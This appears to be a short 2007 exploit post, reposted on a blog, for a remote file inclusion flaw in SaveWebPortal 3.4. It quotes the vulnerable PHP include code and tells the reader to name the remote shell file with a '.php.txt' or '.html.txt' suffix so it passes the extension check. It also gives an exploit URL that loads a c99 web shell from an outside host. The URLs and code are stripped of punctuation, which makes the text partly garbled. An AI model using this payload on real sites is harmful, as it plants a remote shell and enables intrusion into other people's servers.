--------------------------------------------
SaveWebPortal = 3.4(page) Remote File Inclusion Vulnerability
Downloadhttpwww.circeos.itfrontendtheme4index.phppage=downloads
--------------------------------------------
Vulnerable Code
php
....
if (strstr ($page, .php)
strstr ($page, .htm)
strstr ($page, .html)) {
include ($page);
....
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File
index.php =]
--------------------------------------------
Vulnerability
httphost.comindex.phppage=httpmaster-boy.cwsurf.dec99.php.txt
--------------------------------------------
#released by Bl0od3r
Monday, 1 January 2007
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment